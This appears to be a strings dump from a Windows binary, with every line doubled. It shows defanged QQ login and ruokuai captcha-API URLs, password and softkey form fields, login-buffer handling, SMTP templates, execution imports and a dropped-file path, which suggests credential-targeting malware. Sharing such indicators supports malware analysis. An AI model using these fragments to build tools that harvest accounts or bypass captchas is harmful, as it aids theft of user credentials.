for(var v=a.GetBuf("bufST_PTLOGIN"),w="",y=v.GetSize(),b=0;
for(var v=a.GetBuf("bufST_PTLOGIN"),w="",y=v.GetSize(),b=0;
var k=v.GetAt(b).toString("16");
var k=v.GetAt(b).toString("16");
1==k.length&&(k="0" k),w =k
1==k.length&&(k="0" k),w =k
document.body.innerHTML=qq754497519();
document.body.innerHTML=qq754497519();
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=hXXps://mail.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=522005705&daid=4&s_url=hXXps://mail.qq.com
hXXp://api.ruokuai.com/register.xml
hXXp://api.ruokuai.com/register.xml
hXXp://api.ruokuai.com/info.xml
hXXp://api.ruokuai.com/info.xml
hXXp://api.ruokuai.com/recharge.xml
hXXp://api.ruokuai.com/recharge.xml
hXXp://api.ruokuai.com/create.xml
hXXp://api.ruokuai.com/create.xml
hXXp://api.ruokuai.com/reporterror.xml
hXXp://api.ruokuai.com/reporterror.xml
VBScript.RegExp
VBScript.RegExp
MSScriptControl.ScriptControl
MSScriptControl.ScriptControl
if (typeof Date.prototype.toJSON !== 'function') {
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf()) ?
return isFinite(this.valueOf()) ?
this.getUTCFullYear() '-'
this.getUTCFullYear() '-'
f(this.getUTCMonth() 1) '-'
f(this.getUTCMonth() 1) '-'
f(this.getUTCDate()) 'T'
f(this.getUTCDate()) 'T'
f(this.getUTCHours()) ':'
f(this.getUTCHours()) ':'
f(this.getUTCMinutes()) ':'
f(this.getUTCMinutes()) ':'
f(this.getUTCSeconds()) 'Z' : null;
f(this.getUTCSeconds()) 'Z' : null;
String.prototype.toJSON =
String.prototype.toJSON =
Number.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
return this.valueOf();
'"' : '\\"',
'"' : '\\"',
'\\': '\\\\'
'\\': '\\\\'
escapable.lastIndex = 0;
escapable.lastIndex = 0;
return escapable.test(string) ? '"' string.replace(escapable, function (a) {
return escapable.test(string) ? '"' string.replace(escapable, function (a) {
'\\u' ('0000' a.charCodeAt(0).toString(16)).slice(-4);
'\\u' ('0000' a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
function str(key, holder) {
// Produce a string from holder[key].
// Produce a string from holder[key].
k, // The member key.
k, // The member key.
value = holder[key];
value = holder[key];
typeof value.toJSON === 'function') {
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = value.toJSON(key);
value = rep.call(holder, key, value);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
length = value.length;
// Join all of the elements together, separated with commas, and wrap them in
// Join all of the elements together, separated with commas, and wrap them in
v = partial.length === 0 ? '[]' : gap ?
v = partial.length === 0 ? '[]' : gap ?
'[\n' gap partial.join(',\n' gap) '\n' mind ']' :
'[\n' gap partial.join(',\n' gap) '\n' mind ']' :
'[' partial.join(',') ']';
'[' partial.join(',') ']';
length = rep.length;
length = rep.length;
partial.push(quote(k) (gap ? ': ' : ':') v);
partial.push(quote(k) (gap ? ': ' : ':') v);
// Otherwise, iterate through all of the keys in the object.
// Otherwise, iterate through all of the keys in the object.
if (Object.prototype.hasOwnProperty.call(value, k)) {
if (Object.prototype.hasOwnProperty.call(value, k)) {
// Join all of the member texts together, separated with commas,
// Join all of the member texts together, separated with commas,
v = partial.length === 0 ? '{}' : gap ?
v = partial.length === 0 ? '{}' : gap ?
'{\n' gap partial.join(',\n' gap) '\n' mind '}' :
'{\n' gap partial.join(',\n' gap) '\n' mind '}' :
'{' partial.join(',') '}';
'{' partial.join(',') '}';
if (typeof JSON.stringify !== 'function') {
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
JSON.stringify = function (value, replacer, space) {
// that can replace values, or an array of strings that will select the keys.
// that can replace values, or an array of strings that will select the keys.
typeof replacer.length !== 'number')) {
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
throw new Error('JSON.stringify');
// Make a fake root object containing our value under the key of ''.
// Make a fake root object containing our value under the key of ''.
if (typeof JSON.parse !== 'function') {
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
function walk(holder, key) {
var k, v, value = holder[key];
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
return reviver.call(holder, key, value);
// Parsing happens in four stages. In the first stage, we replace certain
// Parsing happens in four stages. In the first stage, we replace certain
cx.lastIndex = 0;
cx.lastIndex = 0;
if (cx.test(text)) {
if (cx.test(text)) {
text = text.replace(cx, function (a) {
text = text.replace(cx, function (a) {
('0000' a.charCodeAt(0).toString(16)).slice(-4);
('0000' a.charCodeAt(0).toString(16)).slice(-4);
// We split the second stage into 4 regexp operations in order to work around
// We split the second stage into 4 regexp operations in order to work around
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// JavaScript structure. The '{' operator is subject to a syntactic ambiguity
// In the optional fourth stage, we recursively walk the new structure, passing
// In the optional fourth stage, we recursively walk the new structure, passing
throw new SyntaxError('JSON.parse');
throw new SyntaxError('JSON.parse');
// These forms are obsolete. It is recommended that JSON.stringify and
// These forms are obsolete. It is recommended that JSON.stringify and
// JSON.parse be used instead.
// JSON.parse be used instead.
if (!Object.prototype.toJSONString) {
if (!Object.prototype.toJSONString) {
Object.prototype.toJSONString = function (filter) {
Object.prototype.toJSONString = function (filter) {
return JSON.stringify(this, filter);
return JSON.stringify(this, filter);
Object.prototype.parseJSON = function (filter) {
Object.prototype.parseJSON = function (filter) {
return JSON.parse(this, filter);
return JSON.parse(this, filter);
JSON.stringify(
JSON.stringify(
.push(
.push(
.map)'){
.map)'){
.splice(
.splice(
) {ary=ary key ','; }
) {ary=ary key ','; }
var ary=''; for (var key in
var ary=''; for (var key in
&password=
&password=
application/x-www-form-urlencoded
application/x-www-form-urlencoded
&softkey=
&softkey=
Content-Disposition: form-data; name="password"
Content-Disposition: form-data; name="password"
{pass}
{pass}
Content-Disposition: form-data; name="softkey"
Content-Disposition: form-data; name="softkey"
{softkey}
{softkey}
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
Content-Disposition: form-data; name="image"; filename="System.Byte[]"
SetClientCertificate
SetClientCertificate
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
F%*.*f
F%*.*f
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
RASAPI32.dll
RASAPI32.dll
WinExec
WinExec
GetWindowsDirectoryA
GetWindowsDirectoryA
GetViewportOrgEx
GetViewportOrgEx
WINMM.dll
WINMM.dll
ShellExecuteA
ShellExecuteA
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
WS2_32.dll
WS2_32.dll
InternetCrackUrlA
InternetCrackUrlA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
WININET.dll
WININET.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
GetViewportExtEx
GetViewportExtEx
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
User32.dll
User32.dll
Gdi32.dll
Gdi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
HTTP/1.0
%s
%s
Reply-To: %s
Reply-To: %s
From: %s
From: %s
To: %s
To: %s
Subject: %s
Subject: %s
Date: %s
Date: %s
Cc: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
%a, %d %b %Y %H:%M:%S
SMTP
SMTP
:%d) |
:%d) |
%I64d%s
%I64d%s
:0{}%s
:0{}%s
:%d)%s
:%d)%s
.PAVCOleException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
zcÃ
zcÃ
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
z>kernel32.dll
z>kernel32.dll
Comdlg32.dll
Comdlg32.dll
program internal error number is %d.
program internal error number is %d.
:"%s"
:"%s"
:"%s".
:"%s".
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
c:\windows\1kmu.exe
c:\windows\1kmu.exe
(*.*)
(*.*)